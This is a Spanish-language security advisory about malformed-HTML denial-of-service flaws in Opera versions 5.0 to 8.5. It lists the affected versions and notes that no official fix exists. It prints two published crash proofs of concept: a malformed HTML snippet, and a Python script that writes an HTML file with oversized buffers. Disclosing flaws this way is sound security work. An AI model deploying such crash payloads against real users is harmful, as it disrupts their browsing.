Vulnerabilidad - Denegación de servicio en Opera Web Browser


Opera Web Browser es propenso a múltiples vulnerabilidades que pueden resultar en un fallo del programa.





El problema se produce cuando el navegador intenta interpretar cierto contenido HTML creado maliciosamente.

No se ha comprobado que esta vulnerabilidad pueda ser utilizada para la ejecución remota de código.

Han sido publicados los siguientes ejemplos, que insertados en una página HTML serían capaces de hacer fallar a este
navegador.

El primer ejemplo es un código HTML mal formado:

<html><head></head><body><bdo>A<bgsound style=
"margin:-99;">A<hr>A<hr></body></html>

El segundo ejemplo es el código de un script para Python, el conocido lenguaje interpretado, el cuál genera en este caso,
contenido HTML:

html = open("opera.html", "w")
html.write("<html style=\"content: url(0);\">\n")
html.write("<head></head>\n")
buff1 = 'A'*32499
html.write("<bodyA>\n"+buff1+"\n")
buff2 = 'B'*153
html.write("<u "+buff2+">\n")
html.write("</body></html>")
html.close()


* Productos vulnerables:

- Opera Web Browser 8.5
- Opera Web Browser 8.0.2
- Opera Web Browser 8.0.1
- Opera Web Browser 8.0
- Opera Web Browser 7.54
- Opera Web Browser 7.53
- Opera Web Browser 7.52
- Opera Web Browser 7.51
- Opera Web Browser 7.50
- Opera Web Browser 7.23
- Opera Web Browser 7.22
- Opera Web Browser 7.21
- Opera Web Browser 7.20 Beta 1 build 2981
- Opera Web Browser 7.20
- Opera Web Browser 7.11.j
- Opera Web Browser 7.11.b
- Opera Web Browser 7.11
- Opera Web Browser 7.10
- Opera Web Browser 7.0 win32 Beta 2
- Opera Web Browser 7.0 win32 Beta 1
- Opera Web Browser 7.0 win32
- Opera Web Browser 7.0.3 win32
- Opera Web Browser 7.0.2 win32
- Opera Web Browser 7.0.1 win32
- Opera Web Browser 6.10 linux
- Opera Web Browser 6.0.5 win32
- Opera Web Browser 6.0.4 win32
- Opera Web Browser 6.0.3 win32
- Opera Web Browser 6.0.3 linux
- Opera Web Browser 6.0.2 win32
- Opera Web Browser 6.0.2 linux
- Opera Web Browser 6.0.1 win32
- Opera Web Browser 6.0.1 linux
- Opera Web Browser 6.0.1
- Opera Web Browser 6.0 win32
- Opera Web Browser 6.0.6
- Opera Web Browser 6.0.6 win32
- Opera Web Browser 6.0
- Opera Web Browser 5.12 win32
- Opera Web Browser 5.12
- Opera Web Browser 5.1.1 win32
- Opera Web Browser 5.1.0 win32
- Opera Web Browser 5.0.2 win32
- Opera Web Browser 5.0 Mac
- Opera Web Browser 5.0 Linux
- Opera Web Browser 8 Beta 3


* Soluciones:

No existe al momento actual, ninguna solución oficial para este problema.


* Relacionados:

Opera Web Browser Multiple Malformed HTML Parsing Denial Of Service Vulnerabilities
http://www.securityfocus.com/bid/15124/info


* Créditos:

posidron@tripbit.net

Fuente:
Por Angela Ruiz
vsantivirus.com



Otras noticias de interés:

Ejecución de código través de imágenes Targa en DirectX de Microsoft Windows
Existe un problema de validación de entrada en las librerías DirectX de Microsoft que podrían permitir a un atacante ejecutar código arbitrario en el sistema víctima. Aunque el problema ha sido solucionado, Microsoft no ha publicado bolet...
Netasq: Predicciones de seguridad 2012
Netasq ha elaborado un informe donde analiza las cinco mayores amenazas para la seguridad que se prevén sucedan en 2012, siendo los ataques basados en Internet móvil los que probablemente se conviertan en el problema más importante....
HAckemate.com.ar // Seminario sobre networking
El seminario sobre networking a darse en el canal de irc, se pasa para este viernes 22, a las 23.00 hs (Hora Argentina), los esperamos ahi....
Documento que muestra los problemas del OOXML
Julio Ortega de vaslibre.org.ve tradujo un interesante documento donde se expone puntos importantes para decirle NO a la solicitud de estandar del OOXML...
Aplicaciones Facebook maliciosas
Sophos ha lanzado la alerta a los usuarios de Facebook: una tercera parte de las aplicaciones de esta red social no son del todo fiables y podrían desvelar datos personales a terceros. Al igual que con otras aplicaciones hay que ser precavido al ins...
Declaración sobre ley de Software Libre y Formatos Abiertos en el Estado uruguayo
Declaración del Plenario Intersindical de Trabajadores (PIT) y Convención Nacional Trabajadores (CNT) sobre ley de Software Libre y Formatos Abiertos en el Estado...
#TuxInfo 42 disponible
Esta disponible para su descarga una nueva edición de una excelente revista digital, en esta oportunidad el N° 42....
Nuevo ataque contra Adobe Illustrator
El equipo de respuestas de seguridad de Adobe System está trabajando para resolver un nuevo problema descubierto en su software Illustrator y lo hacen mientras preparan otro parche de seguridad para la próxima semana....
Un estudio analiza los ataques informáticos en los últimos siete años
Trusted Strategies, en colaboración con Phoenix Technologies han publicado un estudio basado en los procesos judiciales relacionados con los ataques informáticos documentados desde 1999 hasta 2006. La novedad de este análisis radica en el hecho de...
Acceso a contenido local con Microsoft Help ActiveX
Muchas de las características en la ayuda HTML de Windows, son proporcionadas por el "Microsoft Help ActiveX control". El mismo es utilizado tanto en el sistema de ayuda, como en páginas HTML mostradas en el na...

Brindanos
un o una


Redes Sociales

Publicidad


Gana Bitcoins desde tu casa

Categorías


Planeta Vaslibre

Blog Roll




Nube de tags

  • anonimato
  • anonimo
  • antivirus
  • apache
  • blog
  • browser
  • bsd
  • bug
  • centos
  • chrome
  • cifrado
  • computer
  • debian
  • denegacion
  • exploits
  • fedora
  • fice
  • firefox
  • forense
  • freebsd
  • gentoo
  • github
  • gnome
  • gnu
  • gpl
  • gtk
  • hack
  • hacking
  • hosting
  • informatica
  • internet
  • isos
  • libre
  • licencias
  • linux
  • linuxmint
  • lxde
  • micros
  • mint
  • mit
  • mozilla
  • mysql
  • noticia
  • opensource
  • opera
  • pgp
  • php
  • sabayon
  • seguridad
  • servicio
  • system
  • tecnologia
  • thunar
  • thunderbird
  • tor
  • troyanos
  • tware
  • ubuntu
  • underground
  • vaslibre
  • virus
  • viserproject
  • vivaldi
  • vulnerabilidad
  • vulnerabilidades
  • web
  • website
  • windows
  • xanadu
  • xfce
  • xombra